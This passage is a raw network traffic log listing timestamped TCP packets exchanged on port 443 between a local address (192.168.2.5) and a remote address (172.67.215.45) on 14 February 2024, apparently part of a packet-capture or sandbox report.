Feb 14, 2024 09:08:17.911856890 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.911887884 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.911927938 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.911933899 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.911962986 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.911978006 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.913661957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.913681030 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.913738966 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.913743019 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.913779974 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.916244030 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.916271925 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.916312933 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.916317940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.916344881 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.916362047 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.921437979 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.921466112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.921521902 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.921528101 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.921552896 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.921567917 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.923741102 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.923768997 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.923821926 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.923826933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.923858881 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.923880100 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.925499916 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.925519943 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.925571918 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.925579071 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.925616980 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.985845089 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.985899925 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.986002922 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.986025095 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.986071110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.987534046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.987561941 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.987616062 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.987622976 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.987663984 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.989957094 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.989984989 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.990106106 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.990113020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.990159988 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.991648912 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.991672993 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.991727114 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.991730928 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.991796017 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.994209051 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.994230986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.994288921 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.994314909 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.994366884 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.995850086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.995867968 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.995937109 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.995937109 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.995944977 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.995995045 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.998333931 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.998358011 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.998433113 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.998440027 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:17.998490095 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:17.999995947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.000017881 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.000093937 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.000098944 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.000148058 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.002556086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.002600908 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.002655983 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.002660036 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.002697945 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.004321098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.004339933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.004386902 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.004391909 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.004412889 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.004427910 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.006771088 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.006792068 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.006891966 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.006912947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.006980896 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.009152889 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.009179115 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.009272099 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.009278059 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.009329081 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.010946989 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.010972977 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.011030912 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.011034966 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.011080980 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.013400078 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.013430119 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.013477087 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.013480902 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.013518095 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.013539076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.015136957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.015165091 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.015269041 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.015273094 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.015326977 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.017574072 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.017602921 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.017671108 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.017674923 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.017709970 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.017729998 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.019351006 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.019375086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.019442081 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.019445896 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.019490004 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.021701097 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.021724939 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.021778107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.021791935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.021840096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.021862030 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.023400068 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.023431063 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.023478031 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.023483038 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.023514032 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.023535013 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.026021957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.026048899 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.026112080 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.026117086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.026165009 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.027760983 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.027787924 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.027885914 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.027889967 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.027940035 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.030147076 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.030178070 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.030287027 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.030301094 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.030354023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.031956911 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.031980991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.032030106 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.032035112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.032061100 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.032083988 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.034658909 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.034684896 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.034738064 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.034743071 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.034800053 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.036096096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.036123991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.036185980 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.036196947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.036242962 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.038042068 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.038069010 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.038130045 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.038146973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.038172007 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.038197041 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.039747953 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.039772987 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.039813995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.039832115 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.039854050 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.039877892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.041518927 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.041542053 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.041589022 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.041605949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.041624069 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.041657925 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.043215990 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.043245077 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.043282986 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.043301105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.043334961 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.043359995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.045006990 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.045032024 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.045111895 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.045131922 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.045207024 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.046715975 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.046741962 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.046860933 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.046878099 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.046936989 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.048374891 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.048410892 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.048441887 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.048453093 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.048489094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.048513889 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.050019979 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.050044060 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.050090075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.050103903 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.050127983 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.050159931 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.051295042 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.051316977 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.051361084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.051371098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.051400900 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.051426888 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.052866936 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.052891016 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.052931070 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.052947044 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.052983999 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.053014994 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.054626942 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.054649115 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.054714918 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.054723024 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.054769993 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.056271076 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.056297064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.056345940 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.056356907 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.056389093 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.056427002 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.058123112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.058147907 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.058192968 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.058199883 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.058244944 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.058280945 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.058954000 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.058975935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.059063911 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.059063911 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.059070110 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.059120893 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.060935020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.060961008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.061011076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.061019897 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.061053991 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.061081886 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.062612057 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.062638998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.062693119 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.062701941 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.062738895 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.062772036 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.064273119 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.064300060 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.064338923 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.064358950 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.064389944 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.064423084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.065293074 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.065324068 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.065367937 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.065386057 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.065412045 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.065435886 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.067095041 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.067141056 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.067174911 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.067193985 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.067229033 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.067257881 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.069041967 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.069084883 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.069118023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.069125891 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.069176912 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.069211006 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.070713043 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.070753098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.070784092 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.070789099 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.070828915 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.072525978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.072575092 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.072611094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.072617054 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.072659969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.073313951 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.073338032 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.073378086 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.073384047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.073426008 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.074995041 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.075016022 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.075066090 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.075072050 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.075151920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.075151920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.076747894 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.076773882 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.076843023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.076848984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.076893091 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.078630924 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.078655958 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.078696012 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.078701973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.078747034 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.079591036 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.079617977 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.079658985 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.079663038 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.079693079 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.079715967 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.081252098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.081275940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.081336975 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.081341982 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.081384897 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.102067947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.102133989 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.102165937 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.102197886 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.102210045 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.102240086 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.104020119 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.104065895 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.104096889 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.104103088 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.104146004 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.104168892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.105930090 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.105983973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.106014013 CET	49712	443	192.168.2.5	172.67.215.45
